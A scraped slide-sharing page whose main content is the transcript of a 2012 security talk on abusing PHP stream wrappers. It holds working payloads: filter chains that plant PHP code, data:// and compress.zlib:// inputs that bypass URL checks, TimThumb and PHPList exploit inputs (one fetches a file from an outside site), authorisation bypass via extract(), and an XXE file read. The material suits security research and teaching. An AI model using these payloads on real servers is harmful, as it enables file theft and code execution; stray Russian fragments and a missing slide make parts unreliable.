Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 

Dernier (20)

ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 

On secure application of PHP wrappers

  • 1. PHP Wrappers Aleksey Moskvin Positive Technologies May 2012
  • 2. Streams Streams
  • 3. Data reading Wrappers $handle = fopen($file, "rb"); while (!feof($handle)) { $contents .= fread($handle, 8192); } fclose($handle); You can get data not only from local files! $file = 'ftp://user:password@10.0.0.1/pub/file.txt'; $file = „http://127.0.0.1/server-status‟; $file = „php://fd/XXX‟; $file = „expect://ls‟;
  • 4. Data writing Read the file copy ('/etc/passwd' , 'php://output'); file_put_contents(„php://output', file_get_contents('/etc/hosts')); Modify the file, and then write it to the disk move_uploaded_file($_FILES[“attach”]["tmp_name"], “php://filter/string.rot13/resource=./upload/user_attach”); Write data into Apache error_log (PHP >= 5.3.6) error_log („Bypass root perm!‟, 3, „php://fd/2‟);
  • 5. Wrapper zip:// Requirements: PHP is compiled with zip support. You can use zip:// wrapper in case allow_url_fopen = Off. zip:// wrapper allows you to access file inside the archive with an arbitrary name. $zip = new ZipArchive; if ($zip->open('/tmp/any_name_zip_arxiv',1) ) { $zip->addFromString( '/my/header.html', '<?php print_r(ini_get_all());„ ); } $zip->close(); print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
  • 6. NULL Byte Replacement $s = $_POST[„path‟]; include $s.‟/header.html‟; allow_url_include directive restricts the usage of http:// ftp:// data:// wrappers. magic_quotes_gpc directive restricts the usage of NULL byte in local files including. If you can create a zip archive, you can use zip:// wrapper: path=zip:///tmp/any_name_zip_arxiv#/my This is effective if allow_url_fopen=Off and magic_quotes_gpc=On An arbitrary archive name allows you to use temporary files created while content loading. Use hpinfo() to get temporary file path: https://rdot.org/forum/showthread.php?t=1134
  • 7. Wrapper data:// (RFC 2397) According to RFC 2379, data:// wrapper supports more extended syntax: dataurl := "data:" [ mediatype ] [ ";base64" ] "," data mediatype := [ type "/" subtype ] *( ";" parameter ) data := *urlchar parameter := attribute "=" value Wrapper feature: mediatype can be absent or can be filled in by arbitrary values: data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
  • 8. Trick: function stream_get_meta_data Modify array items returned by stream_get_meta_data $password = 'secret'; $file = $_POST['file']; $fp = fopen( $file, 'r'); extract(stream_get_meta_data($fp)); if ( $mediatype === 'text/plain') { ... } if ( $_COOKIE['admin'] === $password) { ... } Rewrite $password variable POST DATA: file=data://text/plain;password=mysecret;base64, Bypass authorization: Cookie: admin=mysecret
  • 9. Wrapper compress.zlib:// compress.zlib:// wrapper does not modify ordinary file content readfile('compress.zlib:///etc/hosts'); Local file path can include arbitrary folders name $url = 'compress.zlib:///http://../etc/hosts'; if (preg_match('/http:///', $url) == true) { echo "Yes!"; }
  • 10. Any Data in parse_url parse_url function handles not only URLs $url_info = parse_url($_POST[„src‟]); if ($url_info['host'] === 'img.youtube.com') { $name = str_replace('/', '', substr($url_info['path'], 4)); copy( $src, './'.$name ); } Loading images from img.youtube.com: POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg Bypass host name checks and create arbitrary files: POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo Local File Manipulation: POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
  • 11. Bypass preg_match validate Filter bypass based on preg_match POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file function validate_url ($url) { $pattern = "/b(?:(?:https?)://|www.)[-a-z0-9+&@#/%?=~_|!:,.;]*[-a-z0-9+&@#/%=~_|]/i"; return preg_match ($pattern, $url); } $src = $_POST['src']; if (!validate_url ($src)) display_error ('invalid url');
  • 12. Arbitrary File Loading in TimThumb TimThumb is a popular script used for image resize. Public Exploit for v 1.32 (08/2011): http://www.exploit-db.com/exploits/17602 New Wrappers Exploit for v1.34 (revision 145) function check_external ($src) { ………………… if (!validate_url ($src)) display_error ('invalid url'); $url_info = parse_url ($src); ................... if ($url_info['host'] == 'www.youtube.com' || …) parse_str($url_info['query']); .................. $fh = fopen($local_filepath, „w‟); $ch = curl_init($src); ………………….. $files_infos = getimagesize ($local_filepath); if (empty($file_infos[„mime‟]) || …..) unlink($local_filepath); ……………………………… http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php &url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
  • 13. File Manipulation in TimThumb v1.35 Requirements: curl_init function is diabled on the target server. ………………… if (!$img = file_get_contents ($src)) { display_error ('error....'); } if (file_put_contents ($local_filepath, $img) == FALSE) неопределенного фильтра does not influence the results of other filters { display_error ('error.....'); } ………………… Create a file with arbitrary content: data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo «Read» local file: compress.zlib://youtube.com/../http://?/../../path/to/local/file
  • 14. Secret features of php://filter wrapper php://filter allows users to filter streams while opening. Filter the file content: readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php'); Unknown filter does not influence the results of other filters. convert.base64-decode and string.strip_tags filters can delete data from the stream. Stephan Esser used convert.base64-decode filter features in an exploit for Piwik in 2009: http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability Since 2009, two important questions are not solved: How to delete «unused» data? What are the advantages of filters?
  • 15. Base64 algorithm: encoding RFC 2045, section 6.8 describes Base64 algorithm. Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  • 16. Base64 algorithm: decoding While decoding, only characters of base64 alphabet are handled. The input string is divided into parts by 4 characters, every part is handled separately.
  • 17. Example. “Instrusion” of stopper You can delete some data using base64_decode several times. $content = "; <? die; ?>n"; $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]n"; $file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode /resource=./PoC'; file_put_contents($file, $content); “Stub”: /Ly8v ( base64_decode('Ly8v') == '///‟ ) convert.base64-decode filter does not handle strings with equal sign in the middle. $s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
  • 18. Filter string.strip_tags Filter string.strip_tags speeds up the “extrusion” process $content = "; <? die; ?>n"; $content .= "=3C=3Fprint('PHP');n"; $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC'; $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C file_put_contents($file, $content); convert.quoted-printable-decode filter handles strings symbol by symbol. Characters in Quoted-Printable ( RFC2045, 6.7 chapter) format are modified into characters of 8 bit code page. Modification into Quoted-Printable format. $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); convert.quoted-printable-decode filter is not effective if the string does not include an equal sign followed by hexadecimal character code. $s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
  • 19. TextPattern: Upload Arbitrary Files (I) File with .php extension stores information about comments‟ authors. $file = $prefs['tempdir'].DS.'evaluator_trace.php'; if (!file_exists($file)) { $fp = fopen($file, 'wb'); if ($fp) fwrite($fp, "<?php return; ?>n". "This trace-file tracks saved comments. (created ". Пп safe_strftime($prefs['archive_dateformat'],time()).")n". "Format is: Type; Probability; Message “ . “(Type can be -1 => spam, 0 => moderate, 1 => visible)nn");
  • 21. Partial File Reading in PHPList <= 2.10.13 (I) The reason is a possibility to modify the structure of $_FILES array http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/ if (is_array($_FILES)) { ## only avatars are files foreach ($_FILES['attribute']['name'] as $key => $val) { if (!empty($_FILES['attribute']['name'][$key])) { $tmpnam = $_FILES['attribute']['tmp_name'][$key]; $size = $_FILES['attribute']['size'][$key]; if ($size < MAX_AVATAR_SIZE) { $avatar = file_get_contents($tmpnam); Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar))); The follow HTML form allows an attacker to upload files into a database. <form action="http://localhost/lists/admin/?page=user&id=1" method="POST” enctype="multipart/form-data" > <input type="file" name="attribute[tmp_name]["> <input type="file" name="attribute[size]["> <input type="file" name="attribute[[tmp_name]"> <input type="file" name="attribute[name]["> <input name="change" value="Save Changes" type="submit"> </form>
  • 22. Partial File Reading in PHPList <= 2.10.13 (II)
  • 23. getimagesize check bypass (I) With filters, you manage not only to delete stoppers but also modify images checked on the basis of getimagesize function. If you manage to inject data into EXIF image
  • 24. getimagesize check bypass (II) extract($_REQUEST); ….. include $templatedir.'/header.html'; ..... if (!empty($_FILES) ) { $file_info = getimagesize($_FILES['image']['tmp_name']); if($file_info['mime'] == 'image/jpeg') { if ( move_uploaded_file( $_FILES['image']['tmp_name'], $folder.'/avatar.jpg') ) ...... Load an image, but a zip archive with /my/header.html file is stored on the server. folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/ Add the file into the zip archive templatedir=zip:///tmp/avatar.jpg#/my
  • 25. Files with arbitrary content If you manage to create a file with arbitrary content, you can: create a session file and exploit the unserialize bug via session_start(); create a zip archive and exploit RFI; create/rewrite files htaccess/htpasswd; create or rewrite templates.
  • 26. parse_ini_file atack parse_ini_file function handles local files only. session_start(); $_SESSION['admin'] = $_POST['name']; ....... $var = parse_ini_file($inifile); require $var['require']; Create session file /tmp/sess_dffdsdf24gssdgsd90 admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5" With filters, transform the session file into format suitable for parse_ini_file function. php://filter/read=convert.base64-decode|convert.base64-decode| convert.base64-decode/resource= /tmp/sess_dffdsdf24gssdgsd90
  • 27. XXE Attack Read files via XML Injection. <?xml version='1.0'?> <!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64- encode/resource=http://127.0.0.1/server-status"> ]> <scan>&test;</scan> simplexml_load_file function and DOMDocument::load method supports wrappers.
  • 28. Limitations for the usage of wrappers By default, you are not allowed to use wrappers in includes with installed Suhosin (even if allow_url_include = On). For example, zip:// wrapper is available as soon as whitelist includes it: suhosin.executor.include.whitelist = “zip” file_exists, is_file, filesize functions return FALSE in case wrappers php://filter, zip://, data:// are used as file names.
  • 29. Thank you for your attention! Questions?